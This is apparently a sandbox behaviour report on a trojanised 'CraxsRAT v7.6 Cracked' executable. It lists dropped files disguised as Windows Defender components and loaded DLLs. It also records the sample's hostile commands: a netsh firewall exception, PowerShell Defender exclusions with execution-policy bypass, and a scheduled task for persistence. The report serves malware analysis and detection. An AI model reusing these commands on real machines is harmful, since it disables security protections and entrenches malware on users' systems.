Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1864
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Mutant created: \Sessions\1\BaseNamedObjects\0e75fed00639ea9e725255499292dcddSGFjS2Vk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: CraxsRAT v7.6 Cracked.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe	ReversingLabs: Detection: 63%
Source: CraxsRAT v7.6 Cracked.exe	Virustotal: Detection: 54%

Source: unknown	Process created: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe "C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe "C:\Users\user\AppData\Local\Temp\CraxsRat.exe"
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1864 -s 800
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe "C:\Users\user\AppData\Local\Temp\CraxsRat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptsp.dll
